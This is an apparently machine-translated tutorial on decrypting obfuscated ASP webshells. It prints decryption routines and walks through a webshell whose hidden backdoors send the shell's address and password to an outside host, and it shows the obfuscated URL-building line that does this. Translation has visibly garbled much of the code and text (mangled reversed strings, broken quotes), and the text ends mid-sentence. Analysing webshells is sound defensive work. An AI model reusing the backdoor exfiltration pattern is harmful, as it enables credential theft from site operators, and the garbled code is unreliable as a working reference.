Analysis and decryption of ASP files

Jindao Ke

The first time I got in touch with the decryption of asp files, I was deeply attracted by these garbled characters, hoping to find the decryption recipe, so I began to explore the path of asp file decryption, after a period of exploration and research, I have a certain understanding of asp file encryption and decryption. I wrote this article as a summary of my learning during this period, at the same time, I will share my experience learned during this period with you. WEBSHELL Decoder & Encoder is also a result of this period.
To understand ASP file decryption, you must first understand the operating principles of asp files. If you do not understand the operating principles of asp files, you cannot decrypt them. Currently, common interactive dynamic web pages include CGI, ASP, JSP, PHP, and c.. net language, while asp language provides a framework for using script files in html. Common scripts include Microsoft VBScript and Microsoft Jscript, and most of them are vbscript. Asp is an interpreted and executed language. It is interpreted and executed one by one in sequence. It must be a complete and correct plaintext code interpreter before execution, the inherent deficiency of this asp language determines that its encryption is completely reversible. Some friends asked me how to implement asp irreversible encryption. I think this is impossible, this is determined by the inherent nature of language. Some may ask vbscript. Isn't encode irreversible? It is similar to other custom encryption functions, except that the decryption function is not included in the asp file but integrated into asp. dll, as long as a LANGUAGE = VBScript is detected in the asp file. encode, it will call the decryption function for decryption, and then execute it row by row. If you want to prevent decryption, you only need to re-compile vbscript at Microsoft. encode.
I believe that the first difficulty encountered by many friends in decrypting asp files is the vbscript. encode encryption. Microsoft's encrypted Internet has been completely decrypted, online vbscript. encode decrypts many websites. Note that when the asp file contains special characters such as "X", the program will exit. This is an error caused by encoding, you only need to replace this special character with another character to continue decryption.
After vbscript. encode is decrypted, only the first shell of the file is stripped, and the subsequent data is encrypted by user-defined functions.
The execution of asp files requires support from certain script environments. The server executes the script code in asp files. For microsoft users, this environment is IIS, therefore, decryption from the running environment is a direction. This decryption feature is that iis must be set up to run asp files for decryption. In another direction, we can decrypt it from the perspective of the script itself. From this perspective, decryption is not supported by the iis environment, but directly decrypted.
First, perform decryption in the iis environment. There is no doubt that you must first set up the iis environment in the system. Because this encryption must be decrypted and then executed through the ExeCuTe decryption function, if we replace the execution with the output function, the plaintext will be obtained. I will introduce three methods for decryption.
The first method is my favorite fso method.

ShiSan = "~ Latency> ELBAT/<effecetirw. esnopseR ~ Latency> RT/<effecetirw. esnopseR ~ Latency> DT/<effecetirw. esnopseR ~ Fi dnE ~ Too many etirW. esnopseR ~ Response> response timeout;) 1-(og. yrotsih response timeout = kcilCno return = eulav nottub = epyt TUPNI <effecetirw. esnopseR ~ EslE ~ Too many etirW. esnopseR ~ Authorization> commandid;) (esolc. wodniw commandid = kcilcno = eulav nottub = epyt TUPN ": ExeCuTe (UZSS (ShiSan ))
The ShiSan value of this Code is the encrypted character, and the UZSS is the decryption function, so we can design it like this and add the following statement after ExeCuTe (UZSS (ShiSan,
Program code
Set fs = server. CreateObject ("scripting. filesystemobject ")
Set outpout = fs. CreateTextFile (server. mappath ("OK. asp"), True)
Outpout. Write (ShiSanFun (ShiSan ))
The OK. asp containing plaintext will be generated in the same directory of the asp file. This is to obtain the source code using the fso method.
The second method works in the same way, but the code is different. This process is written in the file header.
Program code
Sub Write2File (strFile, strContent, blnAppend)
On Error Resume Next
Set objFSO = Server. CreateObject ("Scripting. FileSystemObject ")
If blnAppend Then
Set objWriteText = objFSO. OpenTextFile (strFile, 8, True)
Else
Set objWriteText = objFSO. OpenTextFile (strFile, 2, True)
End If
ObjWriteText. WriteLine (strContent)
Set objWriteText = Nothing
Set objFSO = Nothing
Select Case Err
Case 424 Response. Write "The path is not found or the directory has no Write permission ."
Case Else Response. Write Err
End Select
End Sub only needs to be added to the location to be decrypted

Write2File "M: encryption and decryption \ test1.txt", ShiSanFun (ShiSan), True
. The advantage of this method is that it is functional and can be used multiple times.
The third method implements direct output through the Server. HTMLEncode method. The Code is as follows:
Program code
Function Outpoutstr (objstring)
Response. Write ("<pre>" & Server. HTMLEncode (objstring) & "</pre> ")
End Function
Then ExeCuTe (UZSS (ShiSan) to Outpoutstr (ShiSanFun (ShiSan). Then run the file and output the plaintext in the browser.

The above method is the simplest and most effective for the overall encryption to execute all decrypted files at the end. However, if there are dozens of asp files encrypted, it means that dozens of ExeCuTe files need to be replaced, the restoration of plaintext files will be a huge task. It is easy to solve this problem from the perspective of the script itself. Based on this idea, I wrote the WEBSHELL Decoder & Encoder software. As we all know, the vbscript syntax in asp is the same as that in vb, which means that the decryption function in asp can be directly called in vbprogram, thus saving the trouble of converting and decrypting functions. The following uses an animation to decrypt the Siliemor Shell. asp file of a specific instance to describe the decryption of asp files.

The following is an animation description:


Decrypts a specific instance's Siliemor Shell. asp file to describe the decryption of the asp file. Take a look at this file. Obviously, the first is vbscript. encode.
In this case, we took off the first shell and looked at the file. shellcode. asp has been completely decrypted. We can see two decryption functions that are encrypted in 2.
Function ShiSanFun (ShiSanObjstr)
ShiSanObjstr = Replace (ShiSanObjstr, "comment", "): For ShiSanI = 1 To Len (ShiSanObjstr): If Mid (ShiSanObjstr, ShiSanI, 1) <> "token" Then
ShiSanNewStr = Mid (ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
Else: ShiSanNewStr = vbCrLf & ShiSanNewStr
End If: Next: ShiSanFun = ShiSanNewStr: End Function

Function UZSS (objstr)
Objstr = Replace (objstr, "delimiter", "): For I = 1 To Len (objstr): If Mid (objstr, I, 1) <> "~ "Then
NewStr = Mid (objstr, I, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If: Next: UZSS = NewStr: End Function
First, let's look at the encryption of the first one and the encryption of the 13th item. We can see that there are two items, saved and decrypted, without modifying the parameters!
Now let's look at the second function. The form is the same, but the parameters and function names are slightly changed. Set it. It can be seen that this function has a total of 44 encryption points, saving the results.
Whether to decrypt the file. It has been decrypted. All files are in plain text.

Now the shell is completely decrypted, and now find the backdoor. When xmlhttp is seen, it may be a backdoor. Let's try it.
Obviously, this is the code that is executed after the correct password is entered. Let's run it.
See, Localhost/shellcode2.asp "> http: // www. *******. cn/123/test. asp <chuandi> <mobile> localhost/shellcode2.asp-1 </mobile> </chuandi>
The backdoor has been completely released, and all of our shell addresses and passwords are sent to test. asp.

Okay. Continue.

Here is another backdoor. Let's decrypt it,
Run the file again
The backdoor address is out.
Http: // % 38% 63% 63e % 2E % 63% 6f % 6d/% 61% 62 /? % 75 = localhost/shellcode2.asp & p = 1
You can find this address by yourself.
& Chr (37) & "38" & chr (37) & "63% 63" & chr (101-pos) & "% 2E" & chr (37) & "63% 6f" & chr (37) & "6d/%" & (61 + pos) & "%" & (62 + pos )&"/? % 75 = "& Serveru &" & p = "& UserPass
Chr (37) is "%", pos is 0, no value assigned, so this sentence can be